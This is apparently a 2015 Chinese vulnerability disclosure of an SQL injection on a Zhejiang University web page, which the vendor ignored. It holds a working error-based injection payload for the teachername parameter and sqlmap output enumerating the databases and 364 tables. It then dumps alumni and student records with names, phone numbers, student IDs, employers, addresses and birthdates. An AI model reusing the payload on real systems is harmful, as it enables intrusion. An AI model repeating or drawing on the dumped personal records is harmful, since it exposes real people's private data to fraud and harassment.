2015-11-25: 细节已通知厂商并且等待厂商处理中 2015-11-30: 厂商已经主动忽略漏洞,细节向公众公开
浙江大学某站SQL注入,涉及364张表,11W条敏感数据
注入点:http://**.**.**.**/www/TeacherSearch.jsp?cateId=1&teachername=cqXdHT (GET)注入类型:
---Parameter: teachername (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: cateId=1&teachername=cqXdHT' AND 9589=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (9589=9589) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(113))) AND 'cLai'='cLai---back-end DBMS: Microsoft SQL Server 2008
涉及数据库:
back-end DBMS: Microsoft SQL Server 2008available databases [7]:[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] zju-mach
涉及364张表
back-end DBMS: Microsoft SQL Server 2008Database: zju-mach[364 tables]+---------------------------------------+| AssessBatch || AssessBatchItem || AssessBatchPerson || AssessBatchRaterPerson || AssessData || AssessOrganiseRaterPersonRel || AssessTotal || AuditorConfig || AuthorityGroupColumnControl || AuthorityGroupUiid || AuthorityTemplateColumnsControl || BaseCalendar || BaseClass || BaseClassTrainingScheme || BaseClass_校友修改前备份 || BaseCompany || BaseCompanyCategory || BaseCompanyClassify || BaseCourse || BaseCourseTimetable || BaseCourseTimetableBatch || BaseDoc || BaseImportantHistory || BaseOperatorHistory || BaseOrganise || BaseOrganiseLog || BaseOrganiseLogVersion || BaseOrganisePerson || BaseSchoolCalendar || BaseSpeciality || BaseStudentTrainingScheme || BaseTeachingProject || BaseUser || BaseUserGroup || BaseUserInGroup || BaseUser_备份 || BaselaptopClaimsRecord || ClassEvent || ClassEventPerson || CommonActivity || CommonActivityParticipant || CommonAnnouceApply || CommonAnnounce || CommonApplyConfigTotal || CommonApplyConfigUser || CommonApplyDataTotal || CommonCategory || CommonCategoryConfig || CommonDocument || CommonExerciseAnswer || CommonExerciseDemand || CommonGoodsApplyConfig || CommonGoodsApplyData || CommonNews || CommonParamConfig || CommonRoomBook || CommonSharedDocument || CommonTaskTemplate || CommonVoteConfigItem || CommonVoteConfigOption || CommonVoteConfigTotal || CommonVoteConfigUser || CommonVoteDataDetail || EMBA再次联系提醒 || EMBA学员学分视图 || EMBA校友总览视图 || EmailConfig || EmailHistory || EmailHistoryDetail || EmailNotSendList || EmailOtherAddress || EmailTaskList || EmailTemplate || EmbaAdditionalTimetable || EmbaApplicant || EmbaApply || EmbaChannel || EmbaChannelLinkmanInfo || EmbaChannelPerson || EmbaDefer || EmbaEntranceExaminationBatch || EmbaExaminee_待删除 || EmbaLecture || EmbaLecturePerson || EmbaMarketCustom || EmbaMarketEvent || EmbaMarketPlan_待删除 || EmbaMarketSummary || EmbaMarketSummaryPerson_待删除 || EmbaPossibleExamineeCategory || EmbaPossibleExamineeClassify || EmbaPossibleExamineeEvent_待删除 || EmbaSelectMentorStudent || EmbaSelectOptionTeacher || EmbaSuspend || EmbaTeacherCourses || EmbaTeacherInfo || EmbaTrace_待删除 || FellowBatchMessage || FellowClassify || FellowDateTemp || FellowGroup || FellowGroupPerson || FellowMailDetail || FellowNewsTemp || FellowOrg || FellowOrgDocument || FellowOrgPerson || FellowPlaceInfo || FellowReg || FellowRegQuestion || FellowUpdateAlertConfig || FellowUpdateByOther || ForeignAgreement || ForeignAgreementPartnerConfig || ForeignAgreementPartnerTypeConfig || ForeignAgreementSignaturePersonConfig || ForeignExpert || ForeignInternationalMeeting || ForeignPartner || ForeignPartnerPersonInfo || ForeignPartnerTypeConfig || ForeignPassPortInfo || ForeignPassPortRentRecord || ForeignPassPortStateRecord || ForeignPassPortValidCountry || ForeignVisaRequire || ForeignVisitInPersonInfo || ForeignVisitInPlan || ForeignVisitSummaryRecord || GroupEmailDetail || GroupEmailTotal || GroupEmailUserAddressConfig || GroupSMSAccount || GroupSMSDetail || GroupSMSPrefixConfig || GroupSMSResultInfo || GroupSMSTotal || Hr360AssessBatch || Hr360AssessItem || Hr360AssessOrganise || Hr360AssessPerson || Hr360AssessScoreCollege || Hr360AssessScoreOrg || Hr360AssessedPerson || Hr360AssessedScore || Hr360AssessedScorePerson || MyAlert || MyAnnounceRead || MyConfig || MyGroup || MyGroupPerson || MyMailGet || MyMailSend || MyNote || MyTask || OutsideTeacherInfo || ParttimeTeacherInfo || Person || PersonAbroadExperience || PersonAffair || PersonContact || PersonContact_校友修改前备份 || PersonEducation || PersonEncourage || PersonExperience || PersonImportantHistoty || PersonInfoModifyApply || PersonInfoModifyApplyList || PersonInfoModifySendEmail || PersonMergeLog || PersonPunish || PersonTitle || PersonTitleDetail || PersonTrain || PersonVisitOutExperience || PersonVisitOutTasksType || Person_校友修改前备份 || QueryPerson || SMSMGC || SiteBanner || SiteCate || SiteCateHtml || SiteDoc || SiteHomepageDoc || SiteOrganise || SiteTeacherInfo || StudentClassCommitteeRecord || StudentCourseScore || StudentEventAwards || StudentEventPerson || StudentEventRecord || StudentIdeologicalWorkRecord || StudentInResult || StudentInScore || StudentInfo || StudentInfo_校友修改前备份 || StudentJob || StudentOutResult || StudentOutScore || TeacherContract || TeacherDutyGradeInfo || TeacherEngageInfo || TeacherEngageTargetConfig || TeacherInfo || TeacherLabourRelationship || TeacherPublicAffair || TeacherPublicAffairDetail || TeacherRecommend || TeacherRecommendDetail || TeacherRecommendTitle || TeacherSalary || TeacherSalaryDetail || TeacherTimeBook || TeacherTimeBookDetail || TeacherTitleAffair || TeacherTrainMaterial || TeacherTrainPlan || TeacherTrainRecord || TeacherYearAssessResult || UnhandledReceiveSms || test_3-31下午各表大小快照 || test_4-16中午各表大小快照 || 拼音缩写有误的用户(待修改) || _SerialNumber || __aaa || _adminAuthority || _admininfo || _dbColumnDetailViewer || _dbModifyLog || _dbTable || _dbTableDetail || _dictItem || _dictSet || _exampleTableA || _excelImportTmp || _groupParam || _log || _menu || _quick || _quickFile || _quick_每行记录后方命令 || _quick_每行记录后方查看修改_页面字段 || _quick_每行记录后方设固定值_页面字段 || _quick_表单的字段校验 || _quick_页面需显示的字段 || _report || _reportLog || _stopIpDetail || _stopIpList || _test || _ui || baseClassSchedule || bijiben || dtproperties || emba原始培养方案 || emba导师信息导入临时表 || emba校友导入临时表 || hr360test || sqlmapfile || temp_StudentOrganiseOrder || temp_TeacherOrganiseOrder || tmp111 || tmp112 || tmp_Person || tmp_person1 || tmp_person2 || tmp_student || userSuggestion || 人员生日 || 出访信息数据导入备份 || 出访信息数据导入教师姓名找不到 || 出访信息数据导入教师正常数据 || 初始化教师 || 在读学生人员视图 || 外派生导入20140108 || 外派生导入20140108无学号 || 外派生数据导入 || 外派生数据导入备份 || 外派生数据导入无学号 || 外派生数据导入无学号无班级 || 外派生数据导入无学号有班级 || 外派生数据导入查询不到Personid || 外派生数据导入正常数据姓名和对不上 || 多次就读 || 导入学生测试数据 || 当前生效的人员 || 当前生效的人员姓名PY || 当前生效的人员编制 || 当前生效的用户 || 当前生效的用户姓名人员ID || 当前生效的组织架构 || 接收生数据导入 || 接收生数据导入20130922 || 接收生数据导入20130922备份 || 接收生数据导入备份 || 接收生数据导入正常人员 || 接收生数据导入正常人员2 || 接收生数据导入正常数据之有班级 || 教师人员视图 || 文档中心视图 || 新老部门对照表 || 新闻文档视图 || 来访信息数据导入备份 || 查询_EMBA_企业库清单 || 查询_EMBA_校友库清单 || 查询_EMBA_渠道信息 || 查询_EMBA_考生信息清单 || 查询_人事_推荐人员清单 || 查询_人事_教师清单 || 查询_图实_笔记本借用清单 || 查询_图实_笔记本借用清单_组织 || 查询_图实_笔记本最近一次借用清单 || 查询_图实_笔记本最近一次借用清单_组织 || 查询_外事_出访记录清单 || 查询_外事_合作伙伴清单 || 查询_外事_国际会议清单 || 查询_外事_外派学生清单 || 查询_外事_接收学生清单 || 查询_外事_来访记录清单 || 查询_外事_海外专家清单 || 查询_学工_学生就业意向清单 || 查询_学工_学生清单 || 查询_学生和导师 || 查询_校友_高级查询名单 || 校友_全部校友 || 校友_学生校友_按人头 || 校友_学生校友_按人头_ready || 校友_学生校友_按人次 || 校友_教工校友 || 校友人员视图 || 校友原始数据 || 校友原始数据1028 || 班级视图 || 用户姓名人员ID || 登录名重名视图 || 省份城市比对临时数据表 || 通知分类老数据类别对照表 || 通知文档视图 || 邮件群发视图_全体学生校友_屏蔽生效 || 邮件群发视图_全体学生校友_无屏蔽 || 邮件群发视图_全体教工校友_屏蔽生效 || 邮件群发视图_全体教工校友_无屏蔽 || 邮件群发视图_全体校友_屏蔽生效 || 邮件群发视图_全体校友_无屏蔽 || 邮件群发视图_校友组成员_屏蔽生效 || 邮件群发视图_校友组成员_无屏蔽 || 邮件群发视图_院外联系名单_屏蔽生效 || 邮件群发视图_院外联系名单_无屏蔽 || 邮件群发视图_除教工外的全体学生校友_屏蔽生效 || 邮件群发视图_除教工外的全体学生校友_无屏蔽 || 重名检测 || 重名检测20130718 || 重名检测temp || 重名检测同班 || 重名检测结果20130718 || 重名检测试图 || 非同班重名检测 || 非同班重名检测_相同手机 || 非同班重名检测_相同生日 || 非同班重名检测_相同电话 || 非同班重名检测_相同证件号码 || 非同班重名检测_相同邮箱 || 非在职教工视图 |+---------------------------------------+
id,籍贯,座机,职称,序号,手机,性别,邮编,学号,姓名,备注,职务,导师,校友类别,专业班级,导入备注,毕业时间,QQ号码,身份证号,工作单位,出生年月,电子邮件,通讯地址,state,学位证书号,毕业证书号,备注后的空列,毕业时间formated,出生年月formated10,<blank>,0574-86433266,<blank>,9,13806637300,男,315207,Z0212009,许一君,<blank>,副经理,徐金发,EMBA,03春季班,NULL,2006.3.30.,<blank>,<blank>,中国石化宁波工程有限公司,23272,XuYj@**.**.**.**,浙江省宁波市国家高新区院士路660号,NULL,<blank>,<blank>,<blank>,2006-03-30,1963-09-18100,<blank>,0574-63111902,<blank>,32,13606740688,男,<blank>,Z0412034,杨斌,<blank>,董事长总经理,许小东,EMBA,04春季班,NULL,39355,<blank>,<blank>,杭州嘉汇科技有限公司,24843,go-wave@**.**.**.**,浙江省杭州市中山北路现代城建大厦1808室,NULL,<blank>,<blank>,<blank>,2007-09-30,1968-01-061000,<blank>,0793-2531888,<blank>,10,13506700166,男,334715,Z1012043,胡子龙,<blank>,总经理,<blank>,EMBA,10春2班,NULL,<blank>,<blank>,<blank>,江西玉山南方水泥有限公司,<blank>,ZjjsHZL@**.**.**.**,江西省上饶市玉山县岩瑞镇岩州村虎山集团项目部,NULL,<blank>,<blank>,<blank>,<blank>,<blank>10000,<blank>,<blank>,<blank>,3,15267032775,男,<blank>,3110101340,刘金栋,2013.1.24.增加,<blank>,<blank>,本科,11级农林经济管理,NULL,<blank>,<blank>,<blank>,<blank>,19930101,liujindong@**.**.**.**,<blank>,NULL,<blank>,<blank>,<blank>,<blank>,1993-01-0110001,<blank>,<blank>,<blank>,4,15267031680,男,<blank>,3110101465,马旭,2013.1.24.增加,<blank>,<blank>,本科,11级农林经济管理,NULL,<blank>,<blank>,<blank>,<blank>,19900702,<blank>,<blank>,NULL,<blank>,<blank>,<blank>,<blank>,1990-07-0210002,<blank>,<blank>,<blank>,5,18868819794,男,<blank>,3110101893,赵吕航,2013.1.24.增加,<blank>,<blank>,本科,11级农林经济管理,NULL,<blank>,<blank>,<blank>,<blank>,19930427,3110101893@**.**.**.**,<blank>,NULL,<blank>,<blank>,<blank>,<blank>,1993-04-2710003,<blank>,<blank>,<blank>,6,18868818946,女,<blank>,3110102229,朱悦纳,2013.1.24.增加,<blank>,<blank>,本科,11级农林经济管理,NULL,<blank>,<blank>,<blank>,<blank>,19930719,934409711@**.**.**.**,<blank>,NULL,<blank>,<blank>,<blank>,<blank>,1993-07-1910004,<blank>,<blank>,<blank>,7,15267027670,女,<blank>,3110102287,汤家红,2013.1.24.增加,<blank>,<blank>,本科,11级农林经济管理,NULL,<blank>,<blank>,<blank>,<blank>,19920728,3110102287@**.**.**.**,<blank>,NULL,<blank>,<blank>,<blank>,<blank>,1992-07-2810005,<blank>,<blank>,<blank>,8,15267030943,男,<blank>,3110102348,吴枢,2013.1.24.增加,<blank>,<blank>,本科,11级农林经济管理,NULL,<blank>,<blank>,<blank>,<blank>,19921009,2450399134@**.**.**.**,<blank>,NULL,<blank>,<blank>,<blank>,<blank>,1992-10-0910006,<blank>,<blank>,<blank>,9,15267065490,女,<blank>,3110102396,殷宇靖,2013.1.24.增加,<blank>,<blank>,本科,11级农林经济管理,NULL,<blank>,<blank>,<blank>,<blank>,19930303,904862278@**.**.**.**,<blank>,NULL,<blank>,<blank>,<blank>,<blank>,1993-03-0310007,<blank>,<blank>,<blank>,10,18042300661,女,<blank>,3110103908,赵宇宁,2013.1.24.增加,<blank>,<blank>,本科,11级农林经济管理,NULL,<blank>,<blank>,<blank>,<blank>,19930120,812896836@**.**.**.**,<blank>,NULL,<blank>,<blank>,<blank>,<blank>,1993-01-2010008,<blank>,<blank>,<blank>,11,15803447728,男,<blank>,3110103921,王海贵,2013.1.24.增加,<blank>,<blank>,本科,11级农林经济管理,NULL,<blank>,<blank>,<blank>,<blank>,19930521,617219185@**.**.**.**,<blank>,NULL,<blank>,<blank>,<blank>,<blank>,1993-05-2110009,<blank>,<blank>,<blank>,12,15267027775,女,<blank>,3110104389,刘亚楠,2013.1.24.增加,<blank>,<blank>,本科,11级农林经济管理,NULL,<blank>,<blank>,<blank>,<blank>,19940724,bjdx40005@**.**.**.**,<blank>,NULL,<blank>,<blank>,<blank>,<blank>,1994-07-24
过滤
危害等级:无影响厂商忽略
忽略时间:2015-11-30 23:12
暂无
